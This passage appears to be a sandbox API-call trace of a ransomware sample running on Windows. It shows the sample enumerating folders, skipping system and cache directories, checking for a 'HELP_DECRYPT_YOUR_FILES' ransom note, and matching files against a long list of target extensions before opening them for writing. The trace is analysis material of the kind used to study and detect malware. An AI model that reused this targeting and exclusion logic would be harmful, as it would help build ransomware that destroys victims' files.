	[0168.289] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dbea530, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7dbea530, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7dd326b4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0168.289] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0168.290] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0168.290] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DownloadedScenarios", cAlternateFileName="DOWNLO~1")) returned 1
	[0168.290] lstrcmpW (lpString1="DownloadedScenarios", lpString2="..") returned 1
	[0168.300] lstrcmpW (lpString1="DownloadedScenarios", lpString2=".") returned 1
	[0168.301] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis"
	[0168.301] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0168.301] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="DownloadedScenarios" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios"
	[0168.301] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios"
	[0168.301] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\"
	[0168.301] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\"
	[0168.301] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\*.*"
	[0168.301] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0168.311] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\*.*") returned 62
	[0168.311] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.311] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\*.*", cchLength=0x3e | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*") returned 0x3e
	[0168.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.312] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="windows") returned 0x0
	[0168.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.312] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="boot") returned 0x0
	[0168.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.312] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="system volume information") returned 0x0
	[0168.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.312] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.313] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="temp") returned 0x0
	[0168.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.313] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="program files") returned 0x0
	[0168.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.313] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.313] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="appdata") returned 0x0
	[0168.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.314] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="application data") returned 0x0
	[0168.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.314] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="winnt") returned 0x0
	[0168.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.314] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="tmp") returned 0x0
	[0168.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.314] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="cache") returned 0x0
	[0168.315] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.315] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.315] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.315] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="webcache") returned 0x0
	[0168.315] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.315] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="inetcache") returned 0x0
	[0168.315] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.316] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="nvidia") returned 0x0
	[0168.316] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.316] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="packages") returned 0x0
	[0168.316] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.316] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="cookies") returned 0x0
	[0168.316] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.316] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\*.*", lpSrch="programdata") returned 0x0
	[0168.316] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.317] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe010bd8d, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe010bd8d, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe010bd8d, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="WINDOWS.DIAGNOSTICS.xml", cAlternateFileName="WINDOW~1.XML")) returned 1
	[0168.317] lstrcmpW (lpString1="WINDOWS.DIAGNOSTICS.xml", lpString2="..") returned 1
	[0168.317] lstrcmpW (lpString1="WINDOWS.DIAGNOSTICS.xml", lpString2=".") returned 1
	[0168.317] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\"
	[0168.317] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\", lpString2="WINDOWS.DIAGNOSTICS.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml"
	[0168.317] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml") returned 82
	[0168.317] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.317] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml", cchLength=0x52 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.diagnostics.xml") returned 0x52
	[0168.317] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.318] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.diagnostics.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.318] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.diagnostics.xml" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.diagnostics.xml") returned="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.diagnostics.xml"
	[0168.318] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.diagnostics.xml") returned 82
	[0168.318] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.318] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.318] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0168.319] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.319] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0168.319] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.319] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.319] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.diagnostics.xml" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.diagnostics.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0168.320] CloseHandle (hObject=0xffffffff) returned 1
	[0168.320] CloseHandle (hObject=0xffffffff) returned 1
	[0168.320] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe042cf6a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe042cf6a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe042cf6a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x0, dwReserved1=0x0, cFileName="WINDOWS.PERFTRACKESCALATIONS.xml", cAlternateFileName="WINDOW~3.XML")) returned 1
	[0168.321] lstrcmpW (lpString1="WINDOWS.PERFTRACKESCALATIONS.xml", lpString2="..") returned 1
	[0168.321] lstrcmpW (lpString1="WINDOWS.PERFTRACKESCALATIONS.xml", lpString2=".") returned 1
	[0168.321] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\"
	[0168.321] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\", lpString2="WINDOWS.PERFTRACKESCALATIONS.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKESCALATIONS.xml") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKESCALATIONS.xml"
	[0168.321] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKESCALATIONS.xml") returned 91
	[0168.321] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.321] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKESCALATIONS.xml", cchLength=0x5b | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackescalations.xml") returned 0x5b
	[0168.321] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.329] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackescalations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.329] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackescalations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackescalations.xml") returned="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackescalations.xml"
	[0168.329] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.perftrackescalations.xml") returned 91
	[0168.329] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.330] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0168.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.330] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.